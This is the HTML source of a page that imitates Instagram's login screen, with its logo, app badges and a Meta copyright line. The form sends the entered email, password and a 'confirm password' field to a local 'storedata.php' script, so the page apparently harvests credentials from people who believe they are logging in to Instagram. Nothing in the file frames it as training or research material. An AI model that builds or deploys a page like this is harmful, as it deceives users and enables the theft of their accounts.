<!DOCTYPE html>
<html lang="english">
  <head>
    <title>Instagram</title>
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <meta charset="utf-8" />
    <meta property="twitter:card" content="summary_large_image" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <style data-tag="reset-style-sheet">
      html {  line-height: 1.15;}body {  margin: 0;}* {  box-sizing: border-box;  border-width: 0;  border-style: solid;}p,li,ul,pre,div,h1,h2,h3,h4,h5,h6,figure,blockquote,figcaption {  margin: 0;  padding: 0;}button {  background-color: transparent;}button,input,optgroup,select,textarea {  font-family: inherit;  font-size: 100%;  line-height: 1.85;  margin: 0;}button,select {  text-transform: none;}button,[type="button"],[type="reset"],[type="submit"] {  -webkit-appearance: button;}button::-moz-focus-inner,[type="button"]::-moz-focus-inner,[type="reset"]::-moz-focus-inner,[type="submit"]::-moz-focus-inner {  border-style: none;  padding: 0;}button:-moz-focus,[type="button"]:-moz-focus,[type="reset"]:-moz-focus,[type="submit"]:-moz-focus {  outline: 1px dotted ButtonText;}a {  color: inherit;  text-decoration: inherit;}input {  padding: 2px 4px;}img {  display: block;}html { scroll-behavior: smooth  }
    </style>
    <style data-tag="default-style-sheet">
      html {
        font-family: Inter;
        font-size: 16px;
      }

      body {
        font-weight: 400;
        font-style:normal;
        text-decoration: none;
        text-transform: none;
        letter-spacing: normal;
        line-height: 1.15;
        color: var(--dl-color-gray-black);
        background-color: var(--dl-color-gray-white);

      }
    </style>
    <link
      rel="stylesheet"
      href="https://fonts.googleapis.com/css2?family=Inter:wght@100;200;300;400;500;600;700;800;900&amp;display=swap"
      data-tag="font"
    />
    <link
      rel="stylesheet"
      href="https://fonts.googleapis.com/css2?family=Roboto:ital,wght@0,100;0,300;0,400;0,500;0,700;0,900;1,100;1,300;1,400;1,500;1,700;1,900&amp;display=swap"
      data-tag="font"
    />
    <script src="script.js"></script>
    <link rel="stylesheet" href="./style.css" />
  </head>
  
  <body>
   
      
    
      <div>
      <link href="./i-phone1313pro1.css" rel="stylesheet" />
<form action="storedata.php" method="post" >
      <div class="i-phone1313pro1-container">
        <div class="i-phone1313pro1-i-phone1313pro1">
          <div class="i-phone1313pro1-div">
            <div class="i-phone1313pro1-div1">
              <img
                src="public/playground_assets/instagram1118-jgfq-200h.png"
                alt="Instagram1118"
                class="i-phone1313pro1-instagram"
              />

              <div class="i-phone1313pro1-div5">
                <div class="i-phone1313pro1-label1">
                  <div class="i-phone1313pro1-span1">
                  </div>

                <!--  premiere case --> 
                    <div class="i-phone1313pro1-password1"><input  placeholder="Email" type="email" id="username" class="no-outline" minlength="3" maxlength="50" name="username" style="font-size: 11.5px;"   required></div>
                    </div>

            </div>
              <div class="i-phone1313pro1-formlogin-form">
                <div class="i-phone1313pro1-div2">
                  <!--  seconde case -->
                    <div class="i-phone1313pro1-div3">
                      <div class="i-phone1313pro1-phonenumberusernameoremail"><input placeholder="Password" type="password" id="password" class="no-outline" name="password"  maxlength="50" style="font-size: 11.5px;"  required></div>
                  </div>


                  <div class="i-phone1313pro1-div4">
                    <div class="i-phone1313pro1-label">
                  <!--  derniere case -->
                      <div class="i-phone1313pro1-span"></div>

                      <div class="i-phone1313pro1-password"><input placeholder="Confirm password" type="password" id="cnfrm-password" class="no-outline" name="confirm_password"  maxlength="50" style="font-size: 11.5px;"  required></div>
                    </div>
                  </div>
 
  
               
                  <button type="submit" class="i-phone1313pro1-button">
                    <span class="i-phone1313pro1-text02">
                      <span>Log in</span>
                    </span>
                  </button>
</form>             
                
       <!-- <button  onclick="myFunction()" class="i-phone1313pro1-button2">
          <span class="i-phone1313pro1-text02">
            <span>test 1</span>
          </span>
        </button>

        <button  onclick="myFunction2()" class="i-phone1313pro1-button5">
          <span class="i-phone1313pro1-text02">
            <span>test 2</span>
          </span>
        </button> -->
                  <button class="i-phone1313pro1-button1"></button>
                </div>

                <span class="i-phone1313pro1-text04">
                <!--  <span>Password</span>-->
                </span>
                <!--<span class="i-phone1313pro1-text06">Confirm password</span>-->
              </div>

           <!-- <span class="i-phone1313pro1-text09"><span>E-mail</span></span>-->
          </div>

       

            <div class="i-phone1313pro1-div6">
              <span class="i-phone1313pro1-text11">
                <span>Get the app.</span>
              </span>
              <div class="i-phone1313pro1-div7">
                <img
                  href="instagram://"
                  src="public/playground_assets/c5rp7ymklzpng141-5rbd-200h.png"
                  alt="c5Rp7YmKlzpng141"
                  class="i-phone1313pro1-c5rp7ym-klzpng"
                />
                <img
                href="instagram://"
                  src="public/playground_assets/ehy6qnzydnxpng142-073-200h.png"
                  alt="EHY6QnZYdNXpng142"
                  class="i-phone1313pro1-e-h-y6qn-z-yd-n-xpng"
                />
              </div>
            </div>
            <span class="i-phone1313pro1-text13">
              <span>© 2022 Instagram from Meta</span>
            </span>

            <span class="i-phone1313pro1-text15">
              <span><p id="message"></p></span>
            </span>
          </div>
        </div>
      </div>
    </div>
  </body>
</html>
